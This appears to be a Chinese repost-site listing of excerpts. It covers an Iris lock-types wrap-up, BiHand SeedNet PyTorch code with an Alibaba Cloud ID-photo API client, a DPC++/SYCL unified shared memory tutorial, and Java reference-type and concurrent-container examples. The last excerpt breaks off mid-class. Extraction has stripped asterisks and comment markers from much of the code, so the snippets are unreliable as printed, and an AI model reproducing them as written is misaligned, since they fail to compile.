通过今天的讨论,希望大家对Iris框架中的数据库锁类型配置有了更深入的理解。虽然设置锁类型会让事情变得稍微复杂一点,但这样做真的能帮我们更好地应对多任务同时进行时可能出现的问题,确保系统稳稳当当的不掉链子。 最后,我想说的是,技术的学习是一个不断积累的过程。有时候,我们会觉得某些概念很难理解,但这都是正常的。只要我们保持好奇心和探索精神,总有一天会豁然开朗。希望你们能够持续学习,不断进步! 谢谢大家!
2025-02-23 16:37:04
75
追梦人
转载文章
...seedd代码: Copyright (c) Lixin YANG. All Rights Reserved.r"""Networks for heatmap estimation from RGB images using Hourglass Network"Stacked Hourglass Networks for Human Pose Estimation", Alejandro Newell, Kaiyu Yang, Jia Deng, ECCV 2016"""import numpy as npimport torchimport torch.nn as nnimport torch.nn.functional as Ffrom skimage import io,transform,utilfrom termcolor import colored, cprintfrom bihand.models.bases.bottleneck import BottleneckBlockfrom bihand.models.bases.hourglass import HourglassBisectedimport bihand.utils.func as funcimport matplotlib.pyplot as pltfrom bihand.utils import miscimport matplotlib.cm as cmdef color_mask(output_ok): 颜色映射cmap = plt.cm.get_cmap('jet') 将张量转换为numpy数组mask_array = output_ok.detach().numpy() 创建彩色图像cmap = cm.get_cmap('jet')colored_mask = cmap(mask_array)return colored_mask 可视化 plt.imshow(colored_mask, cmap='jet') plt.axis('off') plt.show()def two_color(mask_tensor): 将张量转换为numpy数组mask_array = mask_tensor.detach().numpy() 将0到1之间的值转换为二值化掩码threshold = 0.5 阈值,大于阈值的为白色,小于等于阈值的为黑色binary_mask = np.where(mask_array > threshold, 1, 0)return binary_mask 可视化 plt.imshow(binary_mask, cmap='gray') plt.axis('off') plt.show()class SeedNet(nn.Module):def __init__(self,nstacks=2,nblocks=1,njoints=21,block=BottleneckBlock,):super(SeedNet, self).__init__()self.njoints = njointsself.nstacks = nstacksself.in_planes = 64self.conv1 = nn.Conv2d(3, self.in_planes, kernel_size=7, stride=2, padding=3, bias=True)self.bn1 = nn.BatchNorm2d(self.in_planes)self.relu = nn.ReLU(inplace=True)self.maxpool = nn.MaxPool2d(2, stride=2)self.layer1 = self._make_residual(block, nblocks, self.in_planes, 2self.in_planes) current self.in_planes is 64 2 = 128self.layer2 = self._make_residual(block, nblocks, self.in_planes, 2self.in_planes) current self.in_planes is 128 2 = 256self.layer3 = self._make_residual(block, nblocks, self.in_planes, self.in_planes)ch = self.in_planes 256hg2b, res1, res2, fc1, _fc1, fc2, _fc2= [],[],[],[],[],[],[]hm, _hm, mask, _mask = [], [], [], []for i in range(nstacks): 2hg2b.append(HourglassBisected(block, nblocks, ch, depth=4))res1.append(self._make_residual(block, nblocks, ch, ch))res2.append(self._make_residual(block, nblocks, ch, ch))fc1.append(self._make_fc(ch, ch))fc2.append(self._make_fc(ch, ch))hm.append(nn.Conv2d(ch, njoints, kernel_size=1, bias=True))mask.append(nn.Conv2d(ch, 1, kernel_size=1, bias=True))if i < nstacks-1:_fc1.append(nn.Conv2d(ch, ch, kernel_size=1, bias=False))_fc2.append(nn.Conv2d(ch, ch, kernel_size=1, bias=False))_hm.append(nn.Conv2d(njoints, ch, kernel_size=1, bias=False))_mask.append(nn.Conv2d(1, ch, kernel_size=1, bias=False))self.hg2b = nn.ModuleList(hg2b) hgs: hourglass stackself.res1 = nn.ModuleList(res1)self.fc1 = nn.ModuleList(fc1)self._fc1 = nn.ModuleList(_fc1)self.res2 = nn.ModuleList(res2)self.fc2 = nn.ModuleList(fc2)self._fc2 = nn.ModuleList(_fc2)self.hm = nn.ModuleList(hm)self._hm = nn.ModuleList(_hm)self.mask = nn.ModuleList(mask)self._mask = nn.ModuleList(_mask)def _make_fc(self, in_planes, out_planes):bn = nn.BatchNorm2d(in_planes)conv = nn.Conv2d(in_planes, out_planes, kernel_size=1, bias=False)return nn.Sequential(conv, bn, self.relu)def _make_residual(self, block, nblocks, in_planes, out_planes):layers = []layers.append( block( in_planes, out_planes) )self.in_planes = out_planesfor i in range(1, nblocks):layers.append(block( self.in_planes, out_planes))return nn.Sequential(layers)def forward(self, x):l_hm, l_mask, l_enc = [], [], []x = self.conv1(x) x: (N,64,128,128)x = self.bn1(x)x = self.relu(x)x = self.layer1(x)x = self.maxpool(x) x: (N,128,64,64)x = self.layer2(x)x = self.layer3(x)for i in range(self.nstacks): 2y_1, y_2, _ = self.hg2b[i](x)y_1 = self.res1[i](y_1)y_1 = self.fc1[i](y_1)est_hm = self.hm[i](y_1)l_hm.append(est_hm)y_2 = self.res2[i](y_2)y_2 = self.fc2[i](y_2)est_mask = self.mask[i](y_2)l_mask.append(est_mask)if i < self.nstacks-1:_fc1 = self._fc1[i](y_1)_hm = self._hm[i](est_hm)_fc2 = self._fc2[i](y_2)_mask = self._mask[i](est_mask)x = x + _fc1 + _fc2 + _hm + _maskl_enc.append(x)else:l_enc.append(x + y_1 + y_2)assert len(l_hm) == self.nstacksreturn l_hm, l_mask, l_encif __name__ == '__main__':a = torch.randn(10, 3, 256, 256) SeedNetmodel = SeedNet() output1,output2,output3 = SeedNetmodel(a) print(output1,output2,output3)total_params = sum(p.numel() for p in SeedNetmodel.parameters())/1000000print("Total parameters: ", total_params)pretrained_weights_path = 'E:/bihand/released_checkpoints/ckp_seednet_all.pth.tar'img_rgb_path=r"E:\FreiHAND\training\rgb\00000153.jpg"img=io.imread(img_rgb_path)resized_img = transform.resize(img, (256, 256), anti_aliasing=True)img256=util.img_as_ubyte(resized_img)plt.imshow(resized_img)plt.axis('off') 关闭坐标轴plt.show()''' implicit HWC -> CHW, 255 -> 1 '''img1 = func.to_tensor(img256).float() 转换为张量并且进行标准化处理''' 0-mean, 1 std, [0,1] -> [-0.5, 0.5] '''img2 = func.normalize(img1, [0.5, 0.5, 0.5], [1, 1, 1])img3 = torch.unsqueeze(img2, 0)ok=img3print(img.shape)SeedNetmodel = SeedNet()misc.load_checkpoint(SeedNetmodel, pretrained_weights_path)加载权重output1, output2, output3 = SeedNetmodel(img3)mask_tensor = torch.rand(1, 64, 64)output=output2[1] 1,1,64,64output_1=output[0] 1,64,64output_ok=torch.sigmoid(output_1[0])output_real=output_1[0].detach().numpy()直接产生的张量图color_mask=color_mask(output_ok) 显示彩色分割图two_color=two_color(output_ok)显示黑白分割图see=output_ok.detach().numpy() 使用Matplotlib库显示分割掩码 plt.imshow(see, cmap='gray') plt.axis('off') plt.show() print(output1, output2, output3)images = [resized_img, color_mask, two_color,output_real,see,see]rows = 1cols = 4 创建子图并展示图像fig, axes = plt.subplots(1, 6, figsize=(30, 5)) 遍历图像列表,并在每个子图中显示图像for i, image in enumerate(images):ax = axes[i] if cols > 1 else axes 如果只有一列,则直接使用axesif i ==5:ax.imshow(image, cmap='gray')else:ax.imshow(image)ax.imshowax.axis('off') 调整子图之间的间距plt.subplots_adjust(wspace=0.1, hspace=0.1) 展示图像plt.show() 上述的代码文件是在bihand/models/net_seed.py中,全部代码链接在https://github.com/lixiny/bihand。 把bihand/models/net_seed.p中的代码修改为我提供的代码即可使用作者训练好的模型和进行各种可视化。(预训练模型根据作者代码提示下载) 3.调用阿里云API进行证件照生成实例 3.1 准备工作 1.找到接口 进入下面链接即可快速访问 link 2.购买试用包 3.查看APPcode 4.下载代码 5.参数说明 3.2 实验代码 !/usr/bin/python encoding: utf-8"""===========================证件照制作接口==========================="""import requestsimport jsonimport base64import hashlibclass Idphoto:def __init__(self, appcode, timeout=7):self.appcode = appcodeself.timeout = timeoutself.make_idphoto_url = 'https://idp2.market.alicloudapi.com/idphoto/make'self.headers = {'Authorization': 'APPCODE ' + appcode,}def get_md5_data(self, body):"""md5加密:param body_json::return:"""md5lib = hashlib.md5()md5lib.update(body.encode("utf-8"))body_md5 = md5lib.digest()body_md5 = base64.b64encode(body_md5)return body_md5def get_photo_base64(self, file_path):with open(file_path, 'rb') as fp:photo_base64 = base64.b64encode(fp.read())photo_base64 = photo_base64.decode('utf8')return photo_base64def aiseg_request(self, url, data, headers):resp = requests.post(url=url, data=data, headers=headers, timeout=self.timeout)res = {"status_code": resp.status_code}try:res["data"] = json.loads(resp.text)return resexcept Exception as e:print(e)def make_idphoto(self, file_path, bk, spec="2"):"""证件照制作接口:param file_path::param bk::param spec::return:"""photo_base64 = self.get_photo_base64(file_path)body_json = {"photo": photo_base64,"bk": bk,"with_photo_key": 1,"spec": spec,"type": "jpg"}body = json.dumps(body_json)body_md5 = self.get_md5_data(body=body)self.headers.update({'Content-MD5': body_md5})data = self.aiseg_request(url=self.make_idphoto_url, data=body, headers=self.headers)return dataif __name__ == "__main__":file_path = "图片地址"idphoto = Idphoto(appcode="你的appcode")d = idphoto.make_idphoto(file_path, "red", "2")print(d) 3.3 实验结果与分析 原图片 背景为红色生成的证件照 背景为蓝色生成的证件照 另外尝试了使用柴犬照片做实验,也生成了证件照 原图 背景为红色生成的证件照 参考(可供参考的链接和引用文献) 1.参考:BiHand: Recovering Hand Mesh with Multi-stage Bisected Hourglass Networks(BMVC2020) 论文链接:https://arxiv.org/pdf/2008.05079.pdf 本篇文章为转载内容。原文链接:https://blog.csdn.net/m0_37758063/article/details/131128967。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-07-11 23:36:51
131
转载
转载文章
...sor b(buf,read_only); 除此之外还可以将buf设置为局部变量,当系统超出buf生存期,buf被销毁,数据也将转移到主机中。 矢量相加源代码 根据上面的知识,这里展示了利用DPC++实现矢量相加的代码。 //第一行在jupyter中指明了该cpp文件的保存位置%%writefile lab/vector_add.cppinclude <CL/sycl.hpp>using namespace sycl;int main() {const int N = 256;// 初始化两个队列并打印std::vector<int> vector1(N, 10);std::cout<<"\nInput Vector1: "; for (int i = 0; i < N; i++) std::cout << vector1[i] << " ";std::vector<int> vector2(N, 20);std::cout<<"\nInput Vector2: "; for (int i = 0; i < N; i++) std::cout << vector2[i] << " ";// 创建缓存区buffer vector1_buffer(vector1);buffer vector2_buffer(vector2);// 提交矢量相加任务queue q;q.submit([&](handler &h) {// 为缓存区创建访问器accessor vector1_accessor (vector1_buffer,h);accessor vector2_accessor (vector2_buffer,h);h.parallel_for(range<1>(N), [=](id<1> index) {vector1_accessor[index] += vector2_accessor[index];});});// 创建主机访问器将设备中数据拷贝到主机当中host_accessor h_a(vector1_buffer,read_only);std::cout<<"\nOutput Values: ";for (int i = 0; i < N; i++) std::cout<< vector1[i] << " ";std::cout<<"\n";return 0;} 运行结果 统一共享内存 (Unified Shared Memory USM) 统一共享内存是一种基于指针的方法,是将CPU内存和GPU内存进行统一的虚拟化方法,对于C++来说,指针操作内存是很常规的方式,USM也可以最大限度的减少C++移植到DPC++的代价。 下图显示了非USM(左)和USM(右)的程序员开发视角。 类型 函数调用 说明 在主机上可访问 在设备上可访问 设备 malloc_device 在设备上分配(显式) 否 是 主机 malloc_host 在主机上分配(隐式) 是 是 共享 malloc_shared 分配可以在主机和设备之间迁移(隐式) 是 是 USM语法 初始化: int data = malloc_shared<int>(N, q); int data = static_cast<int >(malloc_shared(N sizeof(int), q)); 释放 free(data,q); 使用共享内存之后,程序将自动在主机和运算设备之间隐式移动数据。 数据依赖 使用USM时,要注意数据之间的依赖关系以及事件之间的依赖关系,如果两个线程同时修改同一个内存区,将产生不可预测的结果。 我们可以使用不同的选项管理数据依赖关系: 内核任务中的 wait() 使用 depends_on 方法 使用 in_queue 队列属性 wait() q.submit([&](handler &h) {h.parallel_for(range<1>(N), [=](id<1> i) { data[i] += 2; });}).wait(); // <--- wait() will make sure that task is complete before continuingq.submit([&](handler &h) {h.parallel_for(range<1>(N), [=](id<1> i) { data[i] += 3; });}); depends_on auto e = q.submit([&](handler &h) { // <--- e is event for kernel taskh.parallel_for(range<1>(N), [=](id<1> i) { data[i] += 2; });});q.submit([&](handler &h) {h.depends_on(e); // <--- waits until event e is completeh.parallel_for(range<1>(N), [=](id<1> i) { data[i] += 3; });}); in_order queue property queue q(property_list{property::queue::in_order()}); // <--- this will make sure all the task with q are executed sequentially 练习1:事件依赖 以下代码使用 USM,并有三个提交到设备的内核。每个内核修改相同的数据阵列。三个队列之间没有数据依赖关系 为每个队列提交添加 wait() 在第二个和第三个内核任务中实施 depends_on() 方法 使用 in_order 队列属性,而非常规队列: queue q{property::queue::in_order()}; %%writefile lab/usm_data.cppinclude <CL/sycl.hpp>using namespace sycl;static const int N = 256;int main() {queue q{property::queue::in_order()};//用队列限制执行顺序std::cout << "Device : " << q.get_device().get_info<info::device::name>() << "\n";int data = static_cast<int >(malloc_shared(N sizeof(int), q));for (int i = 0; i < N; i++) data[i] = 10;q.parallel_for(range<1>(N), [=](id<1> i) { data[i] += 2; });q.parallel_for(range<1>(N), [=](id<1> i) { data[i] += 3; });q.parallel_for(range<1>(N), [=](id<1> i) { data[i] += 5; });q.wait();//wait阻塞进程for (int i = 0; i < N; i++) std::cout << data[i] << " ";std::cout << "\n";free(data, q);return 0;} 执行结果 练习2:事件依赖 以下代码使用 USM,并有三个提交到设备的内核。前两个内核修改了两个不同的内存对象,第三个内核对前两个内核具有依赖性。三个队列之间没有数据依赖关系 %%writefile lab/usm_data2.cppinclude <CL/sycl.hpp>using namespace sycl;static const int N = 1024;int main() {queue q;std::cout << "Device : " << q.get_device().get_info<info::device::name>() << "\n";//设备选择int data1 = malloc_shared<int>(N, q);int data2 = malloc_shared<int>(N, q);for (int i = 0; i < N; i++) {data1[i] = 10;data2[i] = 10;}auto e1 = q.parallel_for(range<1>(N), [=](id<1> i) { data1[i] += 2; });auto e2 = q.parallel_for(range<1>(N), [=](id<1> i) { data2[i] += 3; });//e1,e2指向两个事件内核q.parallel_for(range<1>(N),{e1,e2}, [=](id<1> i) { data1[i] += data2[i]; }).wait();//depend on e1,e2for (int i = 0; i < N; i++) std::cout << data1[i] << " ";std::cout << "\n";free(data1, q);free(data2, q);return 0;} 运行结果 UMS实验 在主机中初始化两个vector,初始数据为25和49,在设备中初始化两个vector,将主机中的数据拷贝到设备当中,在设备当中并行计算原始数据的根号值,然后将data1_device和data2_device的数值相加,最后将数据拷贝回主机当中,检验最后相加的和是否是12,程序结束前将内存释放。 %%writefile lab/usm_lab.cppinclude <CL/sycl.hpp>include <cmath>using namespace sycl;static const int N = 1024;int main() {queue q;std::cout << "Device : " << q.get_device().get_info<info::device::name>() << "\n";//intialize 2 arrays on hostint data1 = static_cast<int >(malloc(N sizeof(int)));int data2 = static_cast<int >(malloc(N sizeof(int)));for (int i = 0; i < N; i++) {data1[i] = 25;data2[i] = 49;}// STEP 1 : Create USM device allocation for data1 and data2int data1_device = static_cast<int >(malloc_device(N sizeof(int),q));int data2_device = static_cast<int >(malloc_device(N sizeof(int),q));// STEP 2 : Copy data1 and data2 to USM device allocationq.memcpy(data1_device, data1, sizeof(int) N).wait();q.memcpy(data2_device, data2, sizeof(int) N).wait();// STEP 3 : Write kernel code to update data1 on device with sqrt of valueauto e1 = q.parallel_for(range<1>(N), [=](id<1> i) { data1_device[i] = std::sqrt(25); });auto e2 = q.parallel_for(range<1>(N), [=](id<1> i) { data2_device[i] = std::sqrt(49); });// STEP 5 : Write kernel code to add data2 on device to data1q.parallel_for(range<1>(N),{e1,e2}, [=](id<1> i) { data1_device[i] += data2_device[i]; }).wait();// STEP 6 : Copy data1 on device to hostq.memcpy(data1, data1_device, sizeof(int) N).wait();q.memcpy(data2, data2_device, sizeof(int) N).wait();// verify resultsint fail = 0;for (int i = 0; i < N; i++) if(data1[i] != 12) {fail = 1; break;}if(fail == 1) std::cout << " FAIL"; else std::cout << " PASS";std::cout << "\n";// STEP 7 : Free USM device allocationsfree(data1_device, q);free(data1);free(data2_device, q);free(data2);// STEP 8 : Add event based kernel dependency for the Steps 2 - 6return 0;} 运行结果 本篇文章为转载内容。原文链接:https://blog.csdn.net/MCKZX/article/details/127630566。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-07-22 10:28:50
321
转载
转载文章
...圾回收try {Thread.sleep(500);} catch (InterruptedException e) {e.printStackTrace();}System.out.println(m.get());//再分配一个数组,heap将装不下,这时候系统会垃圾回收,先回收一次,如果不够,会把软引用干掉byte[] b = new byte[1024102415];System.out.println(m.get());} }//软引用非常适合缓存使用 2、弱引用 public class M {@Overrideprotected void finalize() throws Throwable {System.out.println("finalize");} } 上图中,tl对象强引用指向ThreadLocal,map中key弱引用指向ThreadLocal,当tl=null时,强引用消失,此时弱引用也将自动被回收,但是此时key=null,value指向10M这个就永远访问不到,既内存泄露 下图中,18行到20行为解决内存泄露问题的,那就是通过remove()将它消除了 / 弱引用遭到gc就会回收/import java.lang.ref.WeakReference;public class T03_WeakReference {public static void main(String[] args) {WeakReference<M> m = new WeakReference<>(new M());System.out.println(m.get());System.gc();System.out.println(m.get());ThreadLocal<M> tl = new ThreadLocal<>();tl.set(new M());tl.remove();} } 3、虚引用 虚引用 虚引用不是给开发人员用的,一般是给写JVM(java虚拟机,没有它java程序运行不了),Netty等技术大牛用的 虚引用,对象当被回收时,会将其放在队列中,此时我们监听到队列中有新值了,就知道有虚引用被回收了 此时我们要做相应的处理,虚引用指向的值,是无法直接get()获取的 虚引用使用场景 一般情况(其它情况暂时没什么用),虚引用指向堆外内存(直接被操作系统管理的内存),JVM无法对其回收 当虚引用对象被回收时,JVM的垃圾回收无法自动回收堆外内存, 但是此时,虚引用对象被回收,会将其放在队列中 操作人员,看到队列中有对象被回收,就进行相应操作,回收堆内存 如何回收堆外内存 C和C++有函数可以用 java现在也提供了Unsafe类可以操作堆外内存,具体请参考上一篇博客,总之,JDK1.8只能通过反射来用,JDK1.9以上可以通过new Unsafe对象来用 Unsafe类的方法有: copyMemory():直接访问内存 allocateMemory():直接分配内存,这就必须手动回收内存了 freeMemory():回收内存 下面是一个虚引用例子,自己看吧,懂得自然懂,现在看不懂的,先收藏或者保存上,以后回来看 / 一个对象是否有虚引用的存在,完全不会对其生存时间构成影响, 也无法通过虚引用来获取一个对象的实例。 为一个对象设置虚引用关联的唯一目的就是能在这个对象被收集器回收时收到一个系统通知。 虚引用和弱引用对关联对象的回收都不会产生影响,如果只有虚引用活着弱引用关联着对象, 那么这个对象就会被回收。它们的不同之处在于弱引用的get方法,虚引用的get方法始终返回null, 弱引用可以使用ReferenceQueue,虚引用必须配合ReferenceQueue使用。 jdk中直接内存的回收就用到虚引用,由于jvm自动内存管理的范围是堆内存, 而直接内存是在堆内存之外(其实是内存映射文件,自行去理解虚拟内存空间的相关概念), 所以直接内存的分配和回收都是有Unsafe类去操作,java在申请一块直接内存之后, 会在堆内存分配一个对象保存这个堆外内存的引用, 这个对象被垃圾收集器管理,一旦这个对象被回收, 相应的用户线程会收到通知并对直接内存进行清理工作。 事实上,虚引用有一个很重要的用途就是用来做堆外内存的释放, DirectByteBuffer就是通过虚引用来实现堆外内存的释放的。/import java.lang.ref.PhantomReference;import java.lang.ref.Reference;import java.lang.ref.ReferenceQueue;import java.util.LinkedList;import java.util.List;public class T04_PhantomReference {private static final List<Object> LIST = new LinkedList<>();private static final ReferenceQueue<M> QUEUE = new ReferenceQueue<>();public static void main(String[] args) {PhantomReference<M> phantomReference = new PhantomReference<>(new M(), QUEUE);new Thread(() -> {while (true) {LIST.add(new byte[1024 1024]);try {Thread.sleep(1000);} catch (InterruptedException e) {e.printStackTrace();Thread.currentThread().interrupt();}System.out.println(phantomReference.get());} }).start();new Thread(() -> {while (true) {Reference<? extends M> poll = QUEUE.poll();if (poll != null) {System.out.println("--- 虚引用对象被jvm回收了 ---- " + poll);} }}).start();try {Thread.sleep(500);} catch (InterruptedException e) {e.printStackTrace();} }} 2、容器 1、发展历史(一定要了解) map容器你需要了解的历史 JDK早期,java提供了Vector和Hashtable两个容器,这两个容器,很多操作都加了锁Synchronized,对于某些不需要用锁的情况下,就显得十分影响性能,所以现在基本没人用这两个容器,但是面试经常问这两个容器里面的数据结构等内容 后来,出现了HashMap,此容器完全不加锁,是用的最多的容器 但是完全不加锁未免不完善,所以java提供了如下方式,将HashMap变为加锁的 //通过Collections.synchronizedMap(HashMap)方法,将其变为加锁Map集合,其中泛型随意,UUID只是举例。static Map<UUID, UUID> m = Collections.synchronizedMap(new HashMap<UUID, UUID>()); 通过阅读源码发现,上面方法将HashMap变为加锁,也是使用Synchronized,只是锁的内容更细,但并不比HashTable效率高多少 所以衍生除了新的容器ConcurrentHashMap ConcurrentHashMap 此容器,插入效率不如上面的,因为它做了各种判断和CAS,但是差距不是特别大 读取效率很高,100个线程同时访问,每个线程读取一百万次实测 Hashtable 39s ,SynchronizedHashMap 38s ,ConcurrentHashMap 1.7s 前两个将近40秒,ConcurrentHashMap只需要不到2s,由此可见此容器读取效率极高 2、为什么推荐使用Queue来做高并发 为什么推荐Queue(队列) Queue接口提供了很多针对多线程非常友好的API(offer ,peek和poll,其中BlockingQueue还添加了put和take可以阻塞),可以说专门为多线程高并发而创造的接口,所以一般我们使用Queue而不用List 以下代码分别使用链表LinkList和ConcurrentQueue,对比一下速度 LinkList用了5s多,ConcurrentQueue几乎瞬间完成 Concurrent接口就是专为多线程设计,多线程设计要多考虑Queue(高并发用)的使用,少使用List / 有N张火车票,每张票都有一个编号 同时有10个窗口对外售票 请写一个模拟程序 分析下面的程序可能会产生哪些问题? 重复销售?超量销售? 使用Vector或者Collections.synchronizedXXX 分析一下,这样能解决问题吗? 就算操作A和B都是同步的,但A和B组成的复合操作也未必是同步的,仍然需要自己进行同步 就像这个程序,判断size和进行remove必须是一整个的原子操作 @author 马士兵/import java.util.LinkedList;import java.util.List;import java.util.concurrent.TimeUnit;public class TicketSeller3 {static List<String> tickets = new LinkedList<>();static {for(int i=0; i<1000; i++) tickets.add("票 编号:" + i);}public static void main(String[] args) {for(int i=0; i<10; i++) {new Thread(()->{while(true) {synchronized(tickets) {if(tickets.size() <= 0) break;try {TimeUnit.MILLISECONDS.sleep(10);} catch (InterruptedException e) {e.printStackTrace();}System.out.println("销售了--" + tickets.remove(0));} }}).start();} }} 队列 import java.util.Queue;import java.util.concurrent.ConcurrentLinkedQueue;public class TicketSeller4 {static Queue<String> tickets = new ConcurrentLinkedQueue<>();static {for(int i=0; i<1000; i++) tickets.add("票 编号:" + i);}public static void main(String[] args) {for(int i=0; i<10; i++) {new Thread(()->{while(true) {String s = tickets.poll();if(s == null) break;else System.out.println("销售了--" + s);} }).start();} }} 3、多线程常用容器 1、ConcurrentHashMap(无序)和ConcurrentSkipListMap(有序,链表,使用跳表数据结构,让查询更快) 跳表:http://blog.csdn.net/sunxianghuang/article/details/52221913 import java.util.;import java.util.concurrent.ConcurrentHashMap;import java.util.concurrent.ConcurrentSkipListMap;import java.util.concurrent.CountDownLatch;public class T01_ConcurrentMap {public static void main(String[] args) {Map<String, String> map = new ConcurrentHashMap<>();//Map<String, String> map = new ConcurrentSkipListMap<>(); //高并发并且排序//Map<String, String> map = new Hashtable<>();//Map<String, String> map = new HashMap<>(); //Collections.synchronizedXXX//TreeMapRandom r = new Random();Thread[] ths = new Thread[100];CountDownLatch latch = new CountDownLatch(ths.length);long start = System.currentTimeMillis();for(int i=0; i<ths.length; i++) {ths[i] = new Thread(()->{for(int j=0; j<10000; j++) map.put("a" + r.nextInt(100000), "a" + r.nextInt(100000));latch.countDown();});}Arrays.asList(ths).forEach(t->t.start());try {latch.await();} catch (InterruptedException e) {e.printStackTrace();}long end = System.currentTimeMillis();System.out.println(end - start);System.out.println(map.size());} } 2、CopyOnWriteList(写时复制)和CopyOnWriteSet 适用于,高并发是,读的多,写的少的情况 当我们写的时候,将容器复制,让写线程去复制的线程写(写的时候加锁) 而读线程依旧去读旧的(读的时候不加锁) 当写完,将对象指向复制后的已经写完的容器,原来容器销毁 大大提高读的效率 / 写时复制容器 copy on write 多线程环境下,写时效率低,读时效率高 适合写少读多的环境 @author 马士兵/import java.util.ArrayList;import java.util.Arrays;import java.util.List;import java.util.Random;import java.util.Vector;import java.util.concurrent.CopyOnWriteArrayList;public class T02_CopyOnWriteList {public static void main(String[] args) {List<String> lists = //new ArrayList<>(); //这个会出并发问题!//new Vector();new CopyOnWriteArrayList<>();Random r = new Random();Thread[] ths = new Thread[100];for(int i=0; i<ths.length; i++) {Runnable task = new Runnable() {@Overridepublic void run() {for(int i=0; i<1000; i++) lists.add("a" + r.nextInt(10000));} };ths[i] = new Thread(task);}runAndComputeTime(ths);System.out.println(lists.size());}static void runAndComputeTime(Thread[] ths) {long s1 = System.currentTimeMillis();Arrays.asList(ths).forEach(t->t.start());Arrays.asList(ths).forEach(t->{try {t.join();} catch (InterruptedException e) {e.printStackTrace();} });long s2 = System.currentTimeMillis();System.out.println(s2 - s1);} } 3、synchronizedList和ConcurrentLinkedQueue package com.mashibing.juc.c_025;import java.util.ArrayList;import java.util.Collections;import java.util.List;import java.util.Queue;import java.util.concurrent.ConcurrentLinkedQueue;public class T04_ConcurrentQueue {public static void main(String[] args) {List<String> strsList = new ArrayList<>();List<String> strsSync = Collections.synchronizedList(strsList);//加锁ListQueue<String> strs = new ConcurrentLinkedQueue<>();//Concurrent链表队列,就是读快for(int i=0; i<10; i++) {strs.offer("a" + i); //add添加,但是不同点是,此方法会返回一个布尔值}System.out.println(strs);System.out.println(strs.size());System.out.println(strs.poll());//取出,取完后将元素去除System.out.println(strs.size());System.out.println(strs.peek());//取出,但是不会将元素从队列删除System.out.println(strs.size());//双端队列Deque} } 4、LinkedBlockingQueue 链表阻塞队列(无界链表,可以一直装东西,直到内存满(其实,也不是无限,其长度Integer.MaxValue就是上限,毕竟最大就这么大)) 主要体现在put和take方法,put添加的时候,如果队列满了,就阻塞当前线程,直到队列有空位,继续插入。take方法取的时候,如果没有值,就阻塞,等有值了,立马去取 import java.util.Random;import java.util.concurrent.BlockingQueue;import java.util.concurrent.LinkedBlockingQueue;import java.util.concurrent.TimeUnit;public class T05_LinkedBlockingQueue {static BlockingQueue<String> strs = new LinkedBlockingQueue<>();static Random r = new Random();public static void main(String[] args) {new Thread(() -> {for (int i = 0; i < 100; i++) {try {strs.put("a" + i); //如果满了,当前线程就会等待(实现阻塞),等多会有空位,将值插入TimeUnit.MILLISECONDS.sleep(r.nextInt(1000));} catch (InterruptedException e) {e.printStackTrace();} }}, "p1").start();for (int i = 0; i < 5; i++) {new Thread(() -> {for (;;) {try {System.out.println(Thread.currentThread().getName() + " take -" + strs.take()); //取内容,如果空了,当前线程就会等待(实现阻塞)} catch (InterruptedException e) {e.printStackTrace();} }}, "c" + i).start();} }} 5、ArrayBlockingQueue 有界阻塞队列(因为Array需要指定长度) import java.util.Random;import java.util.concurrent.ArrayBlockingQueue;import java.util.concurrent.BlockingQueue;import java.util.concurrent.TimeUnit;public class T06_ArrayBlockingQueue {static BlockingQueue<String> strs = new ArrayBlockingQueue<>(10);static Random r = new Random();public static void main(String[] args) throws InterruptedException {for (int i = 0; i < 10; i++) {strs.put("a" + i);}//strs.put("aaa"); //满了就会等待,程序阻塞//strs.add("aaa");//strs.offer("aaa");strs.offer("aaa", 1, TimeUnit.SECONDS);System.out.println(strs);} } 6、特殊的阻塞队列1:DelayQueue 延时队列(按时间进行调度,就是隔多长时间运行,谁隔的少,谁先) 以下例子中,我们添加线程到队列顺序为t12345,正常情况下,会按照顺序运行,但是这里有了延时时间,也就是时间越短,越先执行 步骤很简单,拿到延时队列 指定构造方法 继承 implements Delayed 重写 compareTo和getDelay import java.util.Calendar;import java.util.Random;import java.util.concurrent.BlockingQueue;import java.util.concurrent.DelayQueue;import java.util.concurrent.Delayed;import java.util.concurrent.TimeUnit;public class T07_DelayQueue {static BlockingQueue<MyTask> tasks = new DelayQueue<>();static Random r = new Random();static class MyTask implements Delayed {String name;long runningTime;MyTask(String name, long rt) {this.name = name;this.runningTime = rt;}@Overridepublic int compareTo(Delayed o) {if(this.getDelay(TimeUnit.MILLISECONDS) < o.getDelay(TimeUnit.MILLISECONDS))return -1;else if(this.getDelay(TimeUnit.MILLISECONDS) > o.getDelay(TimeUnit.MILLISECONDS)) return 1;else return 0;}@Overridepublic long getDelay(TimeUnit unit) {return unit.convert(runningTime - System.currentTimeMillis(), TimeUnit.MILLISECONDS);}@Overridepublic String toString() {return name + " " + runningTime;} }public static void main(String[] args) throws InterruptedException {long now = System.currentTimeMillis();MyTask t1 = new MyTask("t1", now + 1000);MyTask t2 = new MyTask("t2", now + 2000);MyTask t3 = new MyTask("t3", now + 1500);MyTask t4 = new MyTask("t4", now + 2500);MyTask t5 = new MyTask("t5", now + 500);tasks.put(t1);tasks.put(t2);tasks.put(t3);tasks.put(t4);tasks.put(t5);System.out.println(tasks);for(int i=0; i<5; i++) {System.out.println(tasks.take());//获取的是toString方法返回值} }} 7、特殊的阻塞队列2:PriorityQueque 优先队列(二叉树算法,就是排序) import java.util.PriorityQueue;public class T07_01_PriorityQueque {public static void main(String[] args) {PriorityQueue<String> q = new PriorityQueue<>();q.add("c");q.add("e");q.add("a");q.add("d");q.add("z");for (int i = 0; i < 5; i++) {System.out.println(q.poll());} }} 8、特殊的阻塞队列3:SynchronusQueue 同步队列(线程池用处非常大) 此队列容量为0,当插入元素时,必须同时有个线程往外取 就是说,当你往这个队列里面插入一个元素,它就拿着这个元素站着(阻塞),直到有个取元素的线程来,它就把元素交给它 就是用来同步数据的,也就是线程间交互数据用的一个特殊队列 package com.mashibing.juc.c_025;import java.util.concurrent.BlockingQueue;import java.util.concurrent.SynchronousQueue;public class T08_SynchronusQueue { 